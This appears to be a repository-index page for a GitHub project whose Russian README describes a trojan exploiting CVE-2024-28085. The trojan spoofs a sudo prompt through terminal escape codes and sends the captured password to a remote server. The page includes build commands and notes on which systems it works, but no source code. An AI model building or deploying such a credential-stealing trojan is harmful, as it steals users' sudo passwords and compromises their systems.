https://github.com/oditynet/sleepall
trojan CVE-2024-28085 CVE 28085
https://github.com/oditynet/sleepall
28085 cve trojan
Last synced: about 1 month ago
JSON representation
trojan CVE-2024-28085 CVE 28085
- Host: GitHub
- URL: https://github.com/oditynet/sleepall
- Owner: oditynet
- License: gpl-3.0
- Created: 2024-08-27T08:34:15.000Z (9 months ago)
- Default Branch: main
- Last Pushed: 2024-12-02T12:54:16.000Z (5 months ago)
- Last Synced: 2024-12-02T13:46:13.513Z (5 months ago)
- Topics: 28085, cve, trojan
- Language: C++
- Homepage:
- Size: 65.4 KB
- Stars: 1
- Watchers: 1
- Forks: 0
- Open Issues: 0
-
Metadata Files:
- Readme: README.md
- License: LICENSE
Awesome Lists containing this project
README
# sleepall
Троян на основе ошибки CVE-2024-28085 (https://people.rit.edu/sjf5462/6831711781/wall_2_27_2024.txt) которая не исправлена еще нигде. Суть: bash поддерживает escape коды и мы можем управлять формой строки в терминале. Троян слушает процессы и ищет pid команды sudo, узнает его родителя и убивает корневой, подсовывая фейковую строку SUDO.Пользователь на терминале выполняет команду sudo <...> и троян видоизменяет ему процесс заставляя пароль ввести не в sudo , а в терминал. После чего пароль уходит на сервер.
Код создан в рамках тестирования и ознакомления, и автор не несет ответственности за ваши дальнейшие действия с ним.
Build:
```
g++ -static sleepall.cpp -o sleepall
gcc server.c -o server
```Фото фейкового приглашения:
Фото что на самом деле происходит в терминале:
Управление процессом пользователю разрешено на:
- arch
- alt 8 sp 10
Запрещено:
- Centos 7P.S.: Уииии, но только работает в bash (zsh нет)